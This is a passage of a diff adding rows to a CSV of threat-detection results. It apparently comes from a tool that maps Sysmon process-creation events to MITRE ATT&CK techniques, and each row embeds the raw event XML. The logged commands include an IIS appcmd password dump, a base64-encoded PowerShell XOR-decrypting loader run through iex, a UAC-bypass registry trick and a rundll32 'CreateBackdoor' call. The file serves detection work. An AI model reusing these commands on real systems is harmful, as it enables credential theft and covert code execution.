+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.964573Z"">
+    </TimeCreated>
+    <EventRecordID>5973</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.924</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001072D7FF00</Data>
+    <Data Name=""ProcessId"">3640</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T13:50:29.459513Z"">
+    </TimeCreated>
+    <EventRecordID>5523</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 13:50:28.662</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9124-5D45-0000-00103B986101</Data>
+    <Data Name=""ProcessId"">6236</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9124-5D45-0000-001022926101</Data>
+    <Data Name=""ParentProcessId"">3180</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\AppData\Local\Temp\fubuki.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T11:23:18.694577Z"">
+    </TimeCreated>
+    <EventRecordID>5407</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 11:23:17.636</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6EA5-5D45-0000-001032CCE100</Data>
+    <Data Name=""ProcessId"">6068</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6EA5-5D45-0000-00107AC9E100</Data>
+    <Data Name=""ParentProcessId"">932</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\WerFault.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami  /groups ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:38.290374Z"">
+    </TimeCreated>
+    <EventRecordID>6170</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:38.270</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE66-5CEB-0000-0010C7F80B00</Data>
+    <Data Name=""ProcessId"">1168</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami  /groups </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE66-5CEB-0000-001058F50B00</Data>
+    <Data Name=""ParentProcessId"">3256</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /c whoami /groups </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f &amp;&amp; REM \system32\AppHostRegistrationVerifier.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-07T23:33:15.303423Z"">
+    </TimeCreated>
+    <EventRecordID>557006</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3232"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-07 23:33:15.285</Data>
+    <Data Name=""ProcessGuid"">747F3D96-183B-610F-0000-0010DC6CD400</Data>
+    <Data Name=""ProcessId"">11324</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f &amp;&amp; REM \system32\AppHostRegistrationVerifier.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
+    <Data Name=""LogonId"">0x7a857</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">1108</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
+    </TimeCreated>
+    <EventRecordID>243523</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
+    <Data Name=""ProcessId"">7380</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
+    </TimeCreated>
+    <EventRecordID>243523</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
+    <Data Name=""ProcessId"">7380</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;) and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine (&quot;C:\Windows\System32\sysprep\sysprep.exe&quot;) in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T02:32:51.831307Z"">
+    </TimeCreated>
+    <EventRecordID>17729</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2024"" ThreadID=""2004"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 02:32:51.728</Data>
+    <Data Name=""ProcessGuid"">365ABB72-28D3-5CDA-0000-001088C71300</Data>
+    <Data Name=""ProcessId"">3976</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\WindowsPowerShell\v1.0\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002045350100</Data>
+    <Data Name=""LogonId"">0x13545</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-28D3-5CDA-0000-00106DC31300</Data>
+    <Data Name=""ParentProcessId"">3068</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\sysprep\sysprep.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\sysprep\sysprep.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
